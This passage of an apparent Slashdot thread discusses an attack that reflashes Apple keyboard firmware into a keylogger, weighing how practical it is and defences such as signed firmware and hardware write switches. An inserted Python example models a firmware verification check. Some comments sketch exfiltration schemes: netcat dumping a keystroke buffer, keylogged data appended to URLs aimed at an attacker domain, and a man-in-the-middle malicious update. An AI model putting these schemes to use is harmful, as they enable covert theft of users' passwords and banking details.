      Spec compliant, secure: choose one. USB was designed for single user computers without security in mind. The only way to solve this (partially) with existing hardware would be to block access to hardware devices from applications running as non-root users, which is fundamentally contrary to the desire to get device drivers out of the kernel for stability. Short of that, this can only be solved by putting a more powerful CPU in the keyboard controller so that it can do a signature check on its own firmware.

    3. Re:What about other keyboard manufacturers? by Scrameustache · · Score: 1

      I'd be kind of surprised if Apple did anything original with its keyboard design other than making them shiny and thin (and giving them no tactile feedback whatsoever.)

      Mine is a USB hub, you can plug in your mouse (right or left hand side, as you wish) and a USB key, or pretty much anything else.

      I like having two mice coming out of it, personally (my preference varies).

      I've never seen that on a windows machine.

      --

      You can't take the sky from me...

    4. Re:What about other keyboard manufacturers? by Anonymous Coward · · Score: 0

      Have you looked?
      I have a USB hub in my "Microsoft Natural Keyboard Pro" which I bought in 2001. It was released in 1999.
      I'm sure other makers have had it for at least as long.

    5. Re:What about other keyboard manufacturers? by mjcb · · Score: 1

      Didn't the old Apple USB keyboards (from the original iMac) that had the power button on it somehow violate the USB standards at the time? Isn't that why they no longer have that button? Or maybe they do, I haven't used a Mac in a while.

    6. Re:What about other keyboard manufacturers? by Grishnakh · · Score: 3, Insightful

      Wouldn't this depend on the keyboard being reflashable from the USB interface? There's a lot of USB microcontrollers out there which can only be re-flashed with physical access to the hardware, not through the USB interface. Maybe this violates USB HID spec, but why does anyone need their keyboard firmware to be upgradeable anyway? This isn't exactly something that changes often. Your typical $5 USB-to-serial adaptor isn't upgradeable either to my knowledge, why should this be?

    7. Re:What about other keyboard manufacturers? by Anonymous Coward · · Score: 0

      I was thinking the same thing (typing on my Logitech Wave)... I would think that before this presentation, most people figured the attack vector YOUR KEYBOARD would be low if not minuscule.

      It is low. It's just that there are now nearly seven billion people on the planet.

    8. Re:What about other keyboard manufacturers? by xenocide2 · · Score: 1

      have littlesnitch on my Macs, so in the unlikely event my keyboard is compromised (God forbid), at least I'll have a clue it's trying to squawk out of turn. :)

      I think you missed the slide where they discussed how to disable it via keyboard commands.

      --
      I Browse at +4 Flamebait

      Open Source Sysadmin

    9. Re:What about other keyboard manufacturers? by lurker-11 · · Score: 1

      The only way to solve this (partially) with existing hardware would be to block access to hardware devices from applications running as non-root users, which is fundamentally contrary to the desire to get device drivers out of the kernel for stability.

      Note that the root user account and the special privileges usually given to it have nothing to do with kernel mode. Code running as root may be able to get code to run in kernel mode, such as by loading a kernel module (and in theory this privilege could be given to other accounts as well), but is still running in regular user mode.

    10. Re:What about other keyboard manufacturers? by richard.york · · Score: 1

      (and giving them no tactile feedback whatsoever.)

      That's funny, because my Apple keyboard seems to have this feature where you apply pressure to the little plastic buttons and this causes a tiny spring loaded plastic mechanism to compress and pop back into place in response to that pressure. It's almost as though I can tell when a button is being pressed and released by virtue of that physical up and down movement of the buttons alone. It seems like there's a word for that...

    11. Re:What about other keyboard manufacturers? by AHuxley · · Score: 1

      This is getting silly, to be honest. The KEYBOARD? Really? adjusts tinfoil hat....
      The US gov got into Crypto AG so they could read embassy etc. traffic in real time.
      That was a hardware fix so that all shipped units would be open to US eyes.
      One hopes this is Apple being Apple, split over itoys, music and an OS, with desktop hardware easy to fix or add to,
      but always keep an open mind and read up on what was done by very very smart Americans in the past.
      The hole for a keyboard sniffer would be worth the effort, all you need is physical access, hoping at one point the KB is used cold to enter a pw.
      Like a simple black box on flight, you might not get the full cockpit chat, but over weeks, you have something.
      The end user can encrypt, look, use cd's OS, wipe and hunt for OS loggers all day and night.
      But the USA might just be back in the hardware game again ;)

      --
      Domestic spying is now "Benign Information Gathering"
    12. Re:What about other keyboard manufacturers? by Doctor_Jest · · Score: 1

      No, I didn't... but that's another matter altogether.

      --
      It's the Stay-Puft Marshmallow Man.
    13. Re:What about other keyboard manufacturers? by Anonymous Coward · · Score: 0

      Or one of those old-fashioned switches.

      In the A position the keyboard can be flashed, in the B position it can't.

      Of course this would probably be relatively expensive if you make a few million of the keyboards but it -is- a solution.

    14. Re:What about other keyboard manufacturers? by dkf · · Score: 1

      The only way to solve this (partially) with existing hardware would be to block access to hardware devices from applications running as non-root users, which is fundamentally contrary to the desire to get device drivers out of the kernel for stability.

      Eh? You sound rather confused about the difference between the root user (still a normal user, though with unusually elevated privileges) and the OS kernel (can do anything at all). There's quite a lot of processes running on the average Unix system that have root privileges but which aren't in the kernel. Having (the majority of) each USB device driver be non-kernel is quite possible, and restricting the "upload new firmware" functionality to root is a very good idea, as is checking for a strong crypto signature of someone I trust on it first. (Who to trust is a separate issue, but with firmware you really want it to be Known Good or you run the risk of real trouble, of which malware is only one of the possible problems. Plain old corrupted files bricking the keyboard is another issue that you don't ever want to encounter...)

      Normal users (and even root if it isn't doing the special look-behind-the-curtain) should just see keyboards as keyboards. There's no reason at all for normal users to be able to reflash their keyboard firmware.

      --
      "Little does he know, but there is no 'I' in 'Idiot'!"
    15. Re:What about other keyboard manufacturers? by Anonymous Coward · · Score: 0

      It is not a problem with the USB Device Firmware Update Specification. The transmitted firmware must contain all necessary information which is needed to make the device accept and write the firmware. That may very well include a password or a cryptographic signature which the device checks to see if the firmware is acceptable. A generic authentication scheme in the update specification would most likely be inadequate or problematic for many device types.

      Note that, short of a hardware switch, protecting against unwanted firmware upgrades is a non-trivial problem. If the user is expected to perform firmware upgrades, then the device must somehow accept new firmwares. You can opt for cryptographically signed firmware files, but that precludes owner-controlled modifications. You can't rely on the OS privilege control (otherwise we wouldn't be discussing this here). The only option which doesn't take control away from the device owner and doesn't rely on OS privilege separation is a synchronized user interaction with the device, such as holding a key combination on a USB keyboard. However, many devices don't have a way for a user to signal "enable firmware upgrade" to the device -- except through the computer, which doesn't solve the problem.
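      To make the accept/reject decision the post above describes concrete, here is an added example (not from the post, and not any vendor's bootloader) modelling a device-side update policy in Python: a keyed MAC over the image stands in for the "password or cryptographic signature" check, a version field refuses rollback, and the "update key held" flag models the synchronized user interaction. The image format, the key, the version numbers and all function names are assumptions; HMAC is used so the example runs with the standard library only, while a real design would prefer a public-key signature so the device holds no secret.

```python
import hashlib
import hmac
import struct
from typing import Tuple

# Constructed values for this example; no real keyboard uses this format.
MAGIC = b"KBFW"
HEADER_LEN = 10          # 4 magic + 2 version + 4 payload length
TAG_LEN = 32             # HMAC-SHA256 output
DEVICE_KEY = b"constructed-per-device-update-key"  # hypothetical, provisioned at the factory
INSTALLED_VERSION = 3    # hypothetical version currently running on the device


def build_image(version: int, payload: bytes, key: bytes = DEVICE_KEY) -> bytes:
    """Vendor/host side: wrap a payload as MAGIC | version | length | payload | tag.

    The tag is an HMAC-SHA256 over everything before it. It plays the role of
    the signature check the post mentions; with HMAC the device must keep the
    key secret, which is why a public-key signature is the better choice.
    """
    header = MAGIC + struct.pack(">HI", version, len(payload))
    body = header + payload
    tag = hmac.new(key, body, hashlib.sha256).digest()
    return body + tag


def check_update(image: bytes, update_key_held: bool,
                 installed_version: int = INSTALLED_VERSION,
                 key: bytes = DEVICE_KEY) -> Tuple[bool, str]:
    """Device-side acceptance policy. Returns (accepted, reason).

    Order matters: the physical gate is checked first so nothing is parsed
    unless the owner is holding the update key, and the tag is verified
    before any header field is interpreted.
    """
    if not update_key_held:
        return False, "update key not held"
    if len(image) < HEADER_LEN + TAG_LEN:
        return False, "image too short"
    body, tag = image[:-TAG_LEN], image[-TAG_LEN:]
    expected = hmac.new(key, body, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, tag):   # constant-time compare
        return False, "bad tag"
    if body[:4] != MAGIC:
        return False, "bad magic"
    version, length = struct.unpack(">HI", body[4:HEADER_LEN])
    if length != len(body) - HEADER_LEN:
        return False, "length mismatch"
    if version <= installed_version:
        return False, "rollback"                 # refuse older or same version
    return True, "accepted"


if __name__ == "__main__":
    good = build_image(4, b"\x90" * 64)          # constructed 64-byte payload
    print(check_update(good, update_key_held=True))    # (True, 'accepted')
    print(check_update(good, update_key_held=False))   # (False, 'update key not held')
    tampered = bytearray(good)
    tampered[HEADER_LEN + 1] ^= 0x01                   # flip one payload bit
    print(check_update(bytes(tampered), True))         # (False, 'bad tag')
```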

    16. Re:What about other keyboard manufacturers? by AmiMoJo · · Score: 1

      Actually, most USB keyboards do not feature updateable firmware. Even if the microcontroller has flash (and most of the cheap ones only use it for things like vendor and product ID, not the actual protocol software) there is nothing in the USB spec that says you have to support firmware updates.

      Of course, you could try programming the chip directly as they do at the factory, but even if it's possible it would probably just be easier to replace it with one of your own.

      --
      const int one = 65536; (Silvermoon, Texture.cs)
      SJW, n: "Someone I don't like, and by the way I'm a fuckwit" - AC
    17. Re:What about other keyboard manufacturers? by AmiMoJo · · Score: 1

      Oh, and one other thing, Atmel AVR microcontrollers support encrypted firmware updates using 128 bit AES. It's pretty secure, and can work over USB.

      --
      const int one = 65536; (Silvermoon, Texture.cs)
      SJW, n: "Someone I don't like, and by the way I'm a fuckwit" - AC
    18. Re:What about other keyboard manufacturers? by ivan256 · · Score: 1

      Your typical $5 USB-to-serial adaptor isn't upgradeable either to my knowledge, why should this be?

      Some of them are. The ones that aren't are that way simply because they took the non-volatile memory out to save a buck, and instead the firmware is uploaded to the device every single time you plug it in. Of course, that means you need to have the manufacturer's driver installed on the computer you wish to use the device on....

    19. Re:What about other keyboard manufacturers? by willy_me · · Score: 1

      From my limited experience in programming USB AVR microcontrollers - there are two ways to load a new firmware via USB. One, you tie a specific pin to ground and then upload the firmware. Two, the existing firmware has to enable the uploading of a new firmware - basically a boot loader. There are specific registers in an AVR micro to enable Boot Loader (Read-While-Write Self-Programming) support.

      So to program the USB-to-serial adaptor, it would have to be disassembled and modified according to what kind of chip it was. There is no way that Boot Loader support was enabled in such a device as it is significantly more complicated than simply leaving it disabled. But the Apple keyboards might need upgrades - likely for international support. These upgrades require Boot Loader support that any application can take advantage of.

    20. Re:What about other keyboard manufacturers? by willy_me · · Score: 1

      Sorry to reply to myself, but it just occurred to me that those USB-to-serial adapters typically use dedicated hardware. Prolific makes a pile of these chips...

    21. Re:What about other keyboard manufacturers? by ThrowAwaySociety · · Score: 1

      (and giving them no tactile feedback whatsoever.)

      That's funny, because my Apple keyboard seems to have this feature where you apply pressure to the little plastic buttons and this causes a tiny spring loaded plastic mechanism to compress and pop back into place in response to that pressure. It's almost as though I can tell when a button is being pressed and released by virtue of that physical up and down movement of the buttons alone. It seems like there's a word for that...

      (O/T)

      Spring mechanism? Well if you have a 15-year-old old Apple keyboard with a spring mechanism, then yeah, you'd get some feedback out of that.

      I was referring to the keyboard discussed in TFA, though. The aluminum ones with chiclet keys that have about 1mm of travel, and tiny rubber dome switches instead of springs. If you can feel those little rubber domes popping, then you have very sensitive fingers, my friend.

    22. Re:What about other keyboard manufacturers? by croddy · · Score: 1

      the aluminum apple keyboard is absolutely horrific to type on. it is the single worst keyboard i have ever used, and nothing else even comes close. it is too low to the desk, it has crappy rubber mush switches, and the keycaps are rounded at the edges so your fingers get lost. my fingers start to hurt after about 20 minutes of typing on one of these nasty little keyboards. they're just awful.

      now, the apple extended keyboard ii, that's a good keyboard.

    23. Re:What about other keyboard manufacturers? by mikiN · · Score: 1

      s/USA/China/g

      I reckon that China's shipped about 3 and a quarter bazillion keyboards worldwide by now.
      Care to check them all for Flash firmware 'stowaways'?

      --
      The Hacker's Guide To The Kernel: Don't panic()!
  14. How is news worthy... by mario_grgic · · Score: 3, Insightful

    I'm sure every microwave out there is "hackable" in the sense you can replace its firmware and make it burn users' popcorn each time. So what?

    Unless you discovered a way to hack someone's keyboard remotely without user intervention, this is not even worth mentioning on a geek site.

    --
    As the island of our knowledge grows, so does the shore of our ignorance.
    1. Re:How is news worthy... by FlyingBishop · · Score: 1

      Are you a computer professional? Because this is huge. My university decided to stop buying PC hardware, and just re-use their existing Windows XP licenses for boot camp on all new machines. Incidentally, every new machine on campus has one of these keyboards. A reasonably curious student could easily pwn a few keyboards in one of the labs, and then have a handy supply of logins to screw around with as he pleases. This is bad bad bad for anyone deploying Mac keyboards in an enterprise environment.

    2. Re:How is news worthy... by mario_grgic · · Score: 1

      Yes, I'm a computer professional :D. Why go into all the trouble flashing ROM and keyboards, when a simple small, unobtrusive USB keyboard logger is so much easier, more convenient and it has larger memory and some of them are no thicker than the keyboard cable. Also, if you have access to the machine, there are other better ways to do what you want.

      --
      As the island of our knowledge grows, so does the shore of our ignorance.
    3. Re:How is news worthy... by Beelzebud · · Score: 1

      How many people do you know that use their microwave to do online banking? THINK

    4. Re:How is news worthy... by AHuxley · · Score: 1

      A USB keyboard logger might be seen by staff or students?
      Once discovered, the Feds etc roll.
      A kb just gets stuck and is replaced or used year after year.
      Dude my KB is messed up
      Dude we have to get this done, its 2 am
      Like pull and push the usb cable a bit dude
      Follow the cable up and press it back in dude
      I am, what the, its like snapped dude, I broke the Apple
      ha ha Apple makes ...
      Dude thats like different plastic, like bigger,
      DUDE, wtf is a huge chip doing in this!

      --
      Domestic spying is now "Benign Information Gathering"
    5. Re:How is news worthy... by Anonymous Coward · · Score: 0

      Yes, there are better ways, except the thing about this hack is it's close to undetectable. A USB keyboard logger can be noticed. I'm not sure if there's any way to detect a reflashed keyboard.

    6. Re:How is news worthy... by mikiN · · Score: 1

      Soon, that question will be rephrased:

      How many people do you know that have a microwave oven that's NOT connected to the 'net in some way? So that they can go to the little nuker's website from work to program it so they can have a hot steamy pizza right when they get home from working late?

      Oops, hacker got there first, now my house's on fire...

      --
      The Hacker's Guide To The Kernel: Don't panic()!
  15. Old tech is the best tech. by oDDmON+oUT · · Score: 1

    This is a hack on all the new shiny aluminum white keyed keyboards.

    I predict a run on eBay sales of old keyboards and USB PC alternatives for the paranoid.

    For the rest, well...you get what you pay for eh?

    --
    Some days it's just not worth
    chewing through my restraints.
    1. Re:Old tech is the best tech. by slyborg · · Score: 2, Funny

      Love the dumb comments on this thread. The army of ninja hackers will not be sneaking into houses tonight to backdoor all of the Apple keyboards in the world. The fact that it requires physical access to the keyboard makes it pretty close to useless except for public access sites and people who are cheating on their S.O. who happens to be a Black Hat hacker. I would suggest in the latter case you are hella screwed anyway.

    2. Re:Old tech is the best tech. by gobbo · · Score: 1

      Those crappy white keyboards? Terrible design. They're white, so look grungy in a few days. It's a clear plastic bowl that collects crap, hair, fuzz, what have you... and then shows it to you, inaccessible to any cleaning strategy. The keys don't depress at the correct angle, and so feel sticky unless you hold your hand at an unergonomic angle. They don't sound right. The cord is too short. The USB hub doesn't provide enough power to most USB sticks.

      The only thing those keyboards have right in the design department is the thin frame, so you can snug your mouse pad up to it and they fit on a keyboard tray together.

  16. FIFO? LIFO? by mano.m · · Score: 1

    The first link says FIFO; the fourth implies LIFO. Which one is it?

    --
    Karma fed to this user will be promptly burnt. Be warned; be wary.
  17. Re:Too much work by dgatwood · · Score: 1

    That's a red herring. Unless they have changed recently, the internal keyboards on Mac laptops are dumb devices---just a bunch of wires and switches. The controller is on the logic board.

    --

    Check out my sci-fi/humor trilogy at PatriotsBooks.

  18. So all it needs... by s0litaire · · Score: 1
    ... is for an enterprising hacker to do:

    1) A bit of code hacking to put the Keylogger + a simple method to send keystrokes to a 3rd party into a firmware update for the keyboard.

    2) Start a "Man in the middle" attack between a Mac user and Mac update servers.

    3) User installs update..

    4) ???

    5) Profit off of all those banking details....

    --
    Laters Sol "Have you found the secrets of the universe? Asked Zebade "I'm sure I left them here somewhere"
  19. Um... I must be missing something by Hortensia+Patel · · Score: 2, Insightful

    If someone has sufficient permissions on your machine to update your firmware, aren't you kind of screwed already? I suppose they could swap your (external) keyboard for a compromised one, but that still implies physical access.

    That said, given that the ability to update is useful, and that the flash memory size we're talking about is so small, is there a significant downside to having the OS check hashes of the firmware code on initialization?

    1. Re:Um... I must be missing something by vertigoCiel · · Score: 3, Insightful

      That's not how you would pull off this attack. It would go something like this:

      "Hey, I think my keyboard's acting up. Could I borrow yours for a sec?"

      "Sure."

    2. Re:Um... I must be missing something by Hortensia+Patel · · Score: 1

      Meh. I'm not sure which one is the attacker in your scenario, but IMHO that's still requiring physical access. You need to:

      1) Be right next to the target, and probably known to them, since people don't generally borrow hardware from total strangers
      2) Have a plausible reason for having a spare keyboard handy
      3) Be able to sabotage the victim's keyboard so that it "acts up" when you need it to

      All in all, I don't find this remotely scary. This is not going to be the dreaded Mac Virus Of The Apocalypse (you know, the one that could take down an entire advertising agency or small art college).

  20. Why was this implemented? Stupid or evil? by Animats · · Score: 3, Insightful

    As the article points out, "For a device as simple as a keyboard, it is hard to imagine why a firmware update mechanism is even required." There's no justification for including an update feature other than as a designed-in security hole. The keyboard CPU should be running off a ROM, or at least an MPU where the security bit has been set to prevent future changes.

    This looks like a "feature" put in for development that should have been pulled before release.

    1. Re:Why was this implemented? Stupid or evil? by Anonymous Coward · · Score: 0

      Jeez, between this and the political stuff on digg the idiots are really out in force today.

    2. Re:Why was this implemented? Stupid or evil? by xianthax · · Score: 1

      generally this is included in development as an easier way to load and test a firmware than using a physical programmer partially due to needing physical access to a connector on a PCB to program. It is also sometimes done to speed your time to market.

      All you need to complete is the bootloader, that is, the software that allows firmware update via USB, and your manufacturing team can go into full speed work, when the final firmware is ready you just program the devices you've already completed, package and you're good to go. Alternatively you would have to have the firmware on complete lock before a manufacturing run could even begin.

      As to the "ROM" debate. Flash is used because it's cheaper, faster to develop with, and faster/cheaper to manufacture with. Most types of "ROM" require special, expensive hardware to program, flash is often easier/cheaper/faster and requires a very simple device to program. Flash is also often internally re-writable by the microcontroller which can sometimes, depending on # of re-write cycles, eliminate the need for separate EEPROM.

  21. Re:Too much work by 93+Escort+Wagon · · Score: 1

    RTFA.

    Update is completely through software. You'd know this if you even glanced at the article.

    New here, I take it?

    --
    #DeleteChrome
  22. People seem to be missing the bigger issue by 93+Escort+Wagon · · Score: 3, Interesting

    The problem here isn't really with the end user's keyboard - flashing that is a lot of work for little return, in most cases.

    The bigger issue is if/when an enterprising criminal gets access at the plant that makes the keyboards. We've seen CDs/DVDs with malware installed (I'm not even thinking about Sony here); we've seen CompactFlash cards preloaded with viruses... if a batch of keyboards shipped out from manufacturing already installed with a key logger, we're really screwed - who's going to notice?

    --
    #DeleteChrome
    1. Re:People seem to be missing the bigger issue by yupa · · Score: 1

      And how will you recover the data ? The keyboard can't call home on its own.

    2. Re:People seem to be missing the bigger issue by Anonymous Coward · · Score: 0

      Keyboard waits for idle time to hit trigger, sends keystrokes to open shell, opens connection out (netcat?) and dumps buffer. Types "exit".

    3. Re:People seem to be missing the bigger issue by fluffy99 · · Score: 1

      How do you know China isn't already doing this? I certainly don't doubt that NSA does this type of stuff.

    4. Re:People seem to be missing the bigger issue by The_mad_linguist · · Score: 1

      Wasn't there an Apple keyboard about ten or fifteen years ago that automatically typed something if there wasn't any input for five minutes?

  23. YOU BEST BE TROLLIN' by Anonymous Coward · · Score: 0

    'physical access unless you have taken over the mac's os'

    lol. That's not 'physical access'. That's "You can use physical access, or use remote access".

    In the later case you can install a key logger in the OS, so why bother with the keyboard.

    ..er, because the user can reformat his machine from read-only media, and think he's safe? That's the whole idea.

    1. Re:YOU BEST BE TROLLIN' by anss123 · · Score: 1

      ..er, because the user can reformat his machine from read-only media, and think he's safe? That's the whole idea.

      If the user reformats his mac how will you retrieve the keylog? Either you need physical access or you have to break into the OS again. If you can break into the OS it's unlikely that the 1000 character keylog waiting for you is worth the effort.

      If you got physical access you can install a physical key logger. A firmware key logger may be easier to hide and install but that's it. You still have to retrieve the data, so excepting the greater ease it's not superior to a simple key logger hidden inside your keyboard. Also, a key logger on the port of your PC is likely easier to install and remove (when the evil guy wants it back to see what's on it) as opposed to hooking your keyboard to a laptop or whatever.

    2. Re:YOU BEST BE TROLLIN' by Architect_sasyr · · Score: 1

      I'm thinking out loud here... but the Mac keyboards have bluetooth, so some sort of secret-key-dumping program might be an alright idea (no idea if it would be feasible). It still requires localised access I know, but you don't have to enter the building, just drive past, fire your secret key out your bluetooth interface and then save the dump you receive back. Once the firmware is there of course.

      Anyway this is just me trying to think outside the box, it might be complete shit.

      --
      Me failed English...
      FreeBSD over Linux. If my comments seem odd, this may explain...
    3. Re:YOU BEST BE TROLLIN' by ivan256 · · Score: 1

      Most mac keyboards don't have bluetooth.

      This is a sensationalist article. Did you read it? It basically says that you can flash bad firmware onto a device. He picked an Apple keyboard for attention. He could have picked a Logitech keyboard, or any number of other PC accessories, or your PC's BIOS. Most of which (including this keyboard) have no security whatsoever stopping you from flashing something other than the manufacturer's image onto the device.

    4. Re:YOU BEST BE TROLLIN' by croddy · · Score: 1

      most keyboards don't have microprocessors and memory. he didn't pick an apple keyboard for attention out of a field of identically vulnerable keyboards. he picked it because it was a special example with odd specifications that enable this attack.

      there are a few Logitech keyboards he could have picked (the programmable ones with the LCD and all that), but no, this is not some widespread problem. this is an apple keyboard issue.

  24. Re:Too much work by Weedhopper · · Score: 3, Interesting

    Not entirely dumb. I have a US keyboard/top case for a late 2006 MB that began registering as a UK keyboard after a Coke spill.

  25. No, It would take me about two seconds by Hal+The+Computer · · Score: 1

    Apple keyboards are pretty standard. You just buy your own and install a keylogger at your leisure. Then you just have to swap your doctored keyboard for theirs. If you have any skill at sleight of hand, you could probably do this while someone is watching you.

    --

    int main(void){int x=01232;while(malloc(x));return x;}
    1. Re:No, It would take me about two seconds by Anonymous Coward · · Score: 0

      If you have any skill at sleight of hand, you could probably do this while someone is watching you.

      Alright, I'll bite: major props to the first youtube video of someone palming a keyboard, pulling it out of someone's ear, and/or rolling the keyboard across the back of their knuckles.

      As for the swap, be sure you've used your keyboard as much as your target, I know I'd notice if I went to type and the keyboard was suddenly clean of all the hair and food and God knows what else...

  26. Hack request!! by erroneus · · Score: 1

    Hopefully some of the keyboard hackers read slashdot. I would like to request a function added to the keyboard that senses certain "L33T" speak words and automatically backspaces and substitutes REAL words in its place. Some parents might even like to see such a function that senses curse words and substitutes +%$#"!! for matching words... could even be marketable...hrm?

    1. Re:Hack request!! by robkore · · Score: 1

      Hopefully some of the keyboard hackers read slashdot. I would like to request a function added to the keyboard that senses certain "L33T" speak words and automatically backspaces and substitutes REAL words in its place. Some parents might even like to see such a function that senses curse words and substitutes +%$#"!! for matching words... could even be marketable...hrm?

      And while we're at it, translate 'u' to 'you', 'r' to 'are', etc... God I hate my friends.

    2. Re:Hack request!! by fatalwall · · Score: 1

      I think parents would rather have it send them logs in relation to keys. That way they can catch their 13-year-old daughters before they meet up with 30-year-old men.

      The functions you describe would probably work a LOT better from the application level anyway, as having the keyboard send a backspace could be bad if the user changes the location of the cursor or changes windows, aka you could end up replacing the wrong thing.

    3. Re:Hack request!! by grcumb · · Score: 1

      Hopefully some of the keyboard hackers read slashdot. I would like to request a function added to the keyboard that senses certain "L33T" speak words and automatically backspaces and substitutes REAL words in its place. Some parents might even like to see such a function that senses curse words and substitutes +%$#"!! for matching words... could even be marketable...hrm?

      So, like, a Perl interpreter, then?

      --
      Crumb's Corollary: Never bring a knife to a bun fight.
  27. Flashing should be disabled without a HW switch by davidwr · · Score: 1

    Most hardware should have the flash locked in read-only mode, unlockable only by pressing a specific button on the hardware that's tied to a write-enable wire.

    There are obvious exceptions - hardware that needs to be flashed routinely, hardware which is inaccessible by wire and controlled by radio, etc. For those devices, other mechanisms to protect from rogue flashes must be in place.

    --
    Knowledge is how to play a game, intelligence is how to win, wisdom is knowing what game to play.
  28. Re:What about Bluetooth? by ArundelCastle · · Score: 1

    TFA and commenters are talking USB (interesting that it applies to laptops too), but what about the other half of Apple's inventory with Bluetooth. Same? I assume it has the same exploitable flash. But how old a model can it be? I haven't read the PDF, sorry... figured TFA would echo Bluetooth if it was mentioned, since that would be a super easy way to swap out someone's keyboard physically or broadcast a firmware update.

  29. Much easier way... by Longjmp · · Score: 3, Informative

    I only need two keystrokes to hack a Mac when I have access to its keyboard:
    Cmd-S
    Voila, root access. Documented here :p (Start into single user mode)

    --
    There are fewer illiterates than people who can't read.
    1. Re:Much easier way... by Anonymous Coward · · Score: 0

      Unless...I have set the EFI password to stop you from booting into single user mode or booting from CD or from booting to target disk mode.

    2. Re:Much easier way... by konohitowa · · Score: 1

      ZOMG! I've got the same hack on Linux! (dogs and cats... they're actually living together...)

  30. Comment removed by account_deleted · · Score: 5, Informative

    Comment removed based on user account deletion

  31. Keylogger or Installer by ae1294 · · Score: 1

    Bet you could infect a keyboard and have it reinfect the computer every time you try and format / reinstall your OS...

    1. Re:Keylogger or Installer by metaforest · · Score: 1

      With what? You have almost no extra room in the keyboard micro to even add a keylogger, and you are suggesting a hostile take over of the host?

      Good luck with that.

    2. Re:Keylogger or Installer by ae1294 · · Score: 1

      With what?

      I've not looked into it but I would guess; admin access while OS is installing, and system dll's for things like auto update to fetch code from the internet...

      It might not be enough room right now, but that on-keyboard storage space will increase over time, so it might be a good idea to keep in mind, no???

    3. Re:Keylogger or Installer by metaforest · · Score: 1

      Maybe you should look into it? Developing firmware for embedded systems is something I do as a regular part of my life. And evaluating how these peripheral systems interact with hosts is essential information in assessing a new threat. To be fair I didn't expect this specific attack, but at the same time it did not surprise me.

      It's been possible for a long time to conscript peripherals. So why hasn't it been more common? Key reason..... too many unknowns.

      And how is a passive device like an HID going to get notified that the host is ready to accept input and which input it is expecting to receive? HID has no visibility to the context of the rest of the system that it is attached to. That information can only come from the monkey at the keyboard. And if the monkey sees said HID doing something when it should not be.... and again the HID has no idea if the monkey is watching, then how is it going to pull off taking over, with less than 1K of code space? While atm there is a potential threat for keylogging.... not much more would fit in the margins.

      I do not see a keyboard getting more resources than it has now. The economics of a keyboard will not allow for it.... Typically the resources for a specific function diminish over time to save costs.

      While other devices will be compromised each in turn to create new vectors, how is this any different than what is going on now in the OS space?

      Just because some highly skilled Blackhat finds, and demos, a half-assed exploit does not mean that it's going to be practical to exploit on a larger scale....

      That the exploit was demoed on a Mac is more telling than the notion that any number of non-mac systems are vulnerable to the same exploit.

      As others have pointed out, this exploit can only be applied when your system has already been compromised by a far more serious threat. Ignoring that potential makes any further discussion of this vector moot.

    4. Re:Keylogger or Installer by mikiN · · Score: 1

      Think outside the box, analyze patterns.

      An example (somewhat better worded than the one I gave in an earlier post, I hope) as seen from the keyboard's perspective:

      - Wait for the user to finish typing in a (simple) URL by hitting the Enter key.
          (Most often, the cursor is now in the URL bar of a browser. It could be that the user is just typing a note or an email, but there are solutions to that, too.)
          Example: google.com
      - Add a string consisting of ".[name of server]/s=[URL encoded string containing keylog buffer]" .
          Example of the final URL: google.com.pwned.org/s=Logged%20Data%20In%20Buffer
      - Add an Enter
      - Perhaps wait a tiny amount of time for the browser to start connecting to the site
      - Now, for cleanup in case the user is just writing a document, send the appropriate number of [Delete Word] keystrokes, to restore the URL to the user's original input (on a PC, this would be Ctrl-Backspace, not ^W because this often closes the current window)

      Note: of course the keyboard should send the data as quickly as possible to give the user no chance to abort the operation by unplugging it.

      The virtual website at google.com.pwned.org (mapped from *.pwned.org) could redirect the user to google.com, but since the data has already been sent, this doesn't matter very much.

      --
      The Hacker's Guide To The Kernel: Don't panic()!
    5. Re:Keylogger or Installer by metaforest · · Score: 1

      It's going to give itself away pretty quickly.
      And with all the XSS going around these days, you think a semi savvy user isn't going to notice a sudden unexpected redirect?
      My history is going to point to the domain I visited, and contain the URL the hackeyboard built.... I would quickly change my keyboard and hunt the asshat down. "Release the hounds!!!!"

      I type URLs by hand in a lot of different contexts... about half of which are not directed at the browser. So it wouldn't take long for this exploit to get caught adding text to a URL in the wrong context.

      And you can tell me to think outside the box all you want, but the exploit and its cockroach-ninja state machine have to fit INSIDE a very tiny box that has almost no resources to support such code.

      This exploit doesn't get to log enough keystrokes to get more than my local password and a few sentences of my first email of the day. The state machine would have a rough time figuring out what to keep and what to junk due to its very limited footprint.

      Good luck with that.

    6. Re:Keylogger or Installer by ae1294 · · Score: 1

      Maybe you should look into it? Developing firmware for embedded systems is something I do as a regular part of my life. And evaluating how these peripheral systems interact with hosts is essential information in assessing a new threat. To be fair I didn't expect this specific attack, but at the same time it did not surprise me.

      Wait what? You develop firmware but you never expected this kind of threat? And you're trying to say maybe I should look into it? Didn't surprise you? Well I'd hope after working with computers for more than awhile nothing should surprise you or anyone else so that's not really saying anything.

      So why hasn't it been more common? Key reason..... too many unknowns.

      What do you base this on? Maybe it is common? No one has been looking for it, right? And why are there too many unknowns? Only a few companies make these chips and the system tells you what is connected to computer X, so anyone who really wanted to compile a list could have different firmwares on their p2p botnet, couldn't they? If nothing else they could break a bunch of your stuff. Remap keyboard scan codes or some other silliness...

      Yes 1K isn't a lot to work with in C or Visual Basic but in ASM it's a lot more iffy isn't it...

      My unwashed masses guess is now that someone has proved you can screw with people's keyboards that others are going to play with the idea and you will be eating your words in a few months, ie pretending you never said what you have.

      I do not see a keyboard getting more resources than it has now. The economics of a keyboard will not allow for it.... Typically the resources for a specific function diminish over time to save costs.

      That is plain wrong. Why do I have a 4 core 3Ghz processor for the same price I paid for a 386sx chip? You should know better, more and more random stuff gets thrown on these controller chips over time and sooner or later there is no cost difference between the good enough one and the one with all the extra junk so the good enough one stops getting made. NO ONE can honestly say they know that keyboards will never get more resources just because of this. It's like saying 640k is more than anyone will ever need and we will never need more than a 1gb HD.

      That the exploit was demoed on a Mac is more telling than the notion that any number of non-mac systems are vulnerable to the same exploit.

      I'm no mac fan but I really don't think it was demoed on a Mac because no other kind of keyboard would have worked, since Macs use the same parts now as normal PCs. I think you missed the inside joke there, son: Mac people scream from the roof tops that their computers can't get infected with malware....

      Everything else you said sounds like your ego is writing checks your ability can't cash..

    7. Re:Keylogger or Installer by ae1294 · · Score: 1

      It's going to give itself away pretty quickly.

      To whom? You? My grandmother? the 16 year old girl using myspace? Have you seen a malware infected computer? It's almost unusable yet normal people keep using it and have no idea there is spyware watching them... Climb down from your tower sometime and visit some non-tek people out in the real world. It's Scary...

      And with all the XSS going around these days, you think a semi savvy user isn't going to notice a sudden unexpected redirect?
